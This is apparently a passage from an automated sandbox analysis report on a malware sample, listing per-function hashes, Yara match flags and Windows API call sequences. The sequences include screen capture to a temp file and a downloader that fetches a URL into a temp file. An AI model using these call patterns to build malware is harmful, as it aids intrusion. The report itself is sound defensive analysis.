                                                                                                • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                • Instruction ID: 417346d0ae02fd64553672aa1fcdcaceb5e3fedd873b6eafe9f940146e5e92a3
                                                                                                • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                                • Instruction Fuzzy Hash: 7A324762D69F014DE7339634C822336A298AFBB3D4F15E737E855B5EA6EB2CC4834105
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 513aa3887f2416a5ba7ceea55bd0b668ad8f01479d0bd6e24764ea37a10713b2
                                                                                                • Instruction ID: cfe2422a6546bef1f61d45af2200ef59159d57cedd5e010ca0acbe3f63374a03
                                                                                                • Opcode Fuzzy Hash: 513aa3887f2416a5ba7ceea55bd0b668ad8f01479d0bd6e24764ea37a10713b2
                                                                                                • Instruction Fuzzy Hash: 0CE1A570A08616EFD714CF28C590AA6B7F1FF48304B14456EE842ABB91D738FC61DB96
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                • Instruction ID: bdb6373ce29bddcccd89889e1aff2584876bdf0d3c207f7a09b013798c687b32
                                                                                                • Opcode Fuzzy Hash: e141dac8b757437fae1aeddb961bff7ddd32a56cbd136b19ae957eab17c051c5
                                                                                                • Instruction Fuzzy Hash: 7DD1D9721481B38ECB2E4A39847503AFFF16A421A530E47EDECF7CA5C2EB24D555D660
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: 0b2ce0476330700c9c1eb322868e03d881af70f583d7d23fa5be46bfec8d9d1e
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: 729153722490B38EEB6E463A857503EFFE15A412A530B07DEECF2CA1C5EF24D595D620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: 53b12877abe9f5bd80a2a3f521651de355e01c50a7045b8389fd82b7b4b17ed8
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: 5B91627230D0B34ADB294639953503FFFE15A523A139A079FE4F2CA2C5EE288965D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: 63e7cdcbb9517fd49346c6299113e934675c3052ff99e17dfc93ffdac5e46095
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: C5913F722490B38EEB6A463A857413EFFE15A421A530B07EDDCF2CA1C5FF24D1A5D620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: 840c7d605cd247ab055e93d746b7d566013b7b825f8c517892cae8bc4eeb6456
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: 6991637230A0B34EDB694639A53403FFFE15A523A135A079FD4F2CB2C5EE1C8965D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: afb02d62afc9735d99c9f7753a96136d674d91d522e2b7dff0b42bef3ce19314
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: EC9194722490B38EDB6E8239857653EFFE19A411A131A07DEECF2CE1C1EF10C556D620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: 65de86ff63b49bdc759aa5d57c760241c770973215aaf00ccaa693d1692859fd
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 8A91527230D0B34ADB2D463AA47403FFFE15A523B135A079FD4F2CA2C5EE189A55D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                • Instruction ID: 37fdfe524dcd558e4d2d5a913e736720a07f1fe66bb95cbfbdccd82c995bce14
                                                                                                • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                • Instruction Fuzzy Hash: BD616B716C0634EADA386A68B891BBE6395DF01B0CF0408E9DD72DB2C0D759D941C756
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                • Instruction ID: d33dadf552dc057ac98c398fef9b4cf1a6c5eb0b8cd52ebb4b7201ad2176a4fd
                                                                                                • Opcode Fuzzy Hash: fc31d320c795f004d24ba8341ded4eebeb73840abc836b894b4ba362e903035c
                                                                                                • Instruction Fuzzy Hash: 446157B1F0063576DA385A28B895BBF63949F41748FE0041FE446DB381DA9DED82864E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: 6b53325c797e79e49ea912d144abe4e31029969cdef177fdc478e0d50309912a
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: B68167722484B38EEB6E4639847A43EFFE15A411A530A07DDECF2CA1C5FF14D156D620
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: 93cadbc9e56ee973348f3b1b45f0aee1066a3e574f5d0b7d1e0efa6f5899e2a2
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: 8581637230D1B34AEB294239957843FFFE15A523A135A079FD4F2CA2C1EE18CA55D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: f169284965b7b23bd415d8bdbc85248a068ad0ca8932e0b5e587cce13c6fdd38
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: B0112B772C0071C3D618CA3DD8B42BBA385EBC5228B2F82FAD8B14B758D736A1C4D600
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: 140c30f2401bdd3d55fd39f42844b97d2838e8a2e1dc8557d0850e1b510d1eed
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: B211297730306167D6148A2DF8B45BFA795EAD53207EC426FD0414B744CE2AE9C19508
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_5a0000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction ID: 2d8ff37f4c33675844704599facfe699adc686cac0cc51f0823283ac99d3fb98
                                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                • Instruction Fuzzy Hash: F411AC72350100AFDB40DE55DCC5FAA77EAFB8A320B298065ED08CB352D676E802C760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction ID: 960014300b2d30d890b4ae01b3da0a23d255d18ceb4a23cca36f7ba25e6d94a1
                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                • Instruction Fuzzy Hash: 2E01D676B506048FDF22CF24C814BAA33F6FF8A216F5544B9D90AD7381E774A941CB90
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000014,?,?), ref: 0040212B
                                                                                                • GetClientRect.USER32(?,?), ref: 00402140
                                                                                                • GetDC.USER32(?), ref: 00402147
                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 0040215A
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040216E
                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402179
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402187
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0040219A
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021A5
                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 004021AE
                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021D2
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004021E0
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040225D
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040226C
                                                                                                • _wcslen.LIBCMT ref: 00402275
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                • String ID: Tahoma
                                                                                                • API String ID: 3832963559-3580928618
                                                                                                • Opcode ID: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                • Instruction ID: 93c85de950fa204d17176c6e5f5269daa7db8447991b35657298edc932ea58e6
                                                                                                • Opcode Fuzzy Hash: 33b9b76472e38ae72e1de4aa9982544c59de680f6868419fd236333dfe6a8388
                                                                                                • Instruction Fuzzy Hash: FD710072900228AFDB22DF64DD85FAEB7BCEF09711F0041A5B609E6155DA74AF80CF54
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?), ref: 004025C3
                                                                                                • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025D5
                                                                                                • ReleaseCapture.USER32 ref: 004025E8
                                                                                                • GetDC.USER32(00000000), ref: 0040260F
                                                                                                • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 00402696
                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040269F
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004026A9
                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026D7
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004026E0
                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004026F2
                                                                                                • GetTempFileNameW.KERNEL32(?,hef,00000000,?), ref: 0040270D
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402727
                                                                                                • DeleteDC.GDI32(00000000), ref: 0040272E
                                                                                                • DeleteObject.GDI32(00000000), ref: 00402735
                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00402743
                                                                                                • DestroyWindow.USER32(?), ref: 0040274A
                                                                                                • SetCapture.USER32(?), ref: 00402797
                                                                                                • GetDC.USER32(00000000), ref: 004027CB
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004027E1
                                                                                                • GetKeyState.USER32(0000001B), ref: 004027EE
                                                                                                • DestroyWindow.USER32(?), ref: 00402803
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                • String ID: hef
                                                                                                • API String ID: 2545303185-98441221
                                                                                                • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                • Instruction ID: 6404a1bd8bdd16505a4d1f9f7bc5f19f1db645eaa89dd97748bc8e107e8a24e2
                                                                                                • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                • Instruction Fuzzy Hash: 86B1BD71D40219DFDB219F68C880BFEBBF5BF08304F1445A9E8A9A7251D735AA51CF60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                                                • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0216A893
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169BFF
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C11
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C23
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C35
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C47
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C59
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C6B
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C7D
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169C8F
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169CA1
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169CB3
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169CC5
                                                                                                  • Part of subcall function 02169BE2: _free.LIBCMT ref: 02169CD7
                                                                                                • _free.LIBCMT ref: 0216A888
                                                                                                  • Part of subcall function 021636C1: HeapFree.KERNEL32(00000000,00000000,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?), ref: 021636D7
                                                                                                  • Part of subcall function 021636C1: GetLastError.KERNEL32(?,?,0216A34F,?,00000000,?,00000000,?,0216A5F3,?,00000007,?,?,0216A9E7,?,?), ref: 021636E9
                                                                                                • _free.LIBCMT ref: 0216A8AA
                                                                                                • _free.LIBCMT ref: 0216A8BF
                                                                                                • _free.LIBCMT ref: 0216A8CA
                                                                                                • _free.LIBCMT ref: 0216A8EC
                                                                                                • _free.LIBCMT ref: 0216A8FF
                                                                                                • _free.LIBCMT ref: 0216A90D
                                                                                                • _free.LIBCMT ref: 0216A918
                                                                                                • _free.LIBCMT ref: 0216A950
                                                                                                • _free.LIBCMT ref: 0216A957
                                                                                                • _free.LIBCMT ref: 0216A974
                                                                                                • _free.LIBCMT ref: 0216A98C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction ID: f19e5e8d83035c7aa9e550c85a0c9c571fbaa6efb0aa32587b538b4ce678b238
                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction Fuzzy Hash: 59315031A803059FEB21AF38D848B7E77E9BF00711F214469E459E7260DB31E971CBA4
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                                                • _free.LIBCMT ref: 0043A621
                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                • _free.LIBCMT ref: 0043A643
                                                                                                • _free.LIBCMT ref: 0043A658
                                                                                                • _free.LIBCMT ref: 0043A663
                                                                                                • _free.LIBCMT ref: 0043A685
                                                                                                • _free.LIBCMT ref: 0043A698
                                                                                                • _free.LIBCMT ref: 0043A6A6
                                                                                                • _free.LIBCMT ref: 0043A6B1
                                                                                                • _free.LIBCMT ref: 0043A6E9
                                                                                                • _free.LIBCMT ref: 0043A6F0
                                                                                                • _free.LIBCMT ref: 0043A70D
                                                                                                • _free.LIBCMT ref: 0043A725
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02132C74
                                                                                                • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02132C8A
                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 02132CA6
                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02132CBC
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02132CF5
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02132D31
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02132D4E
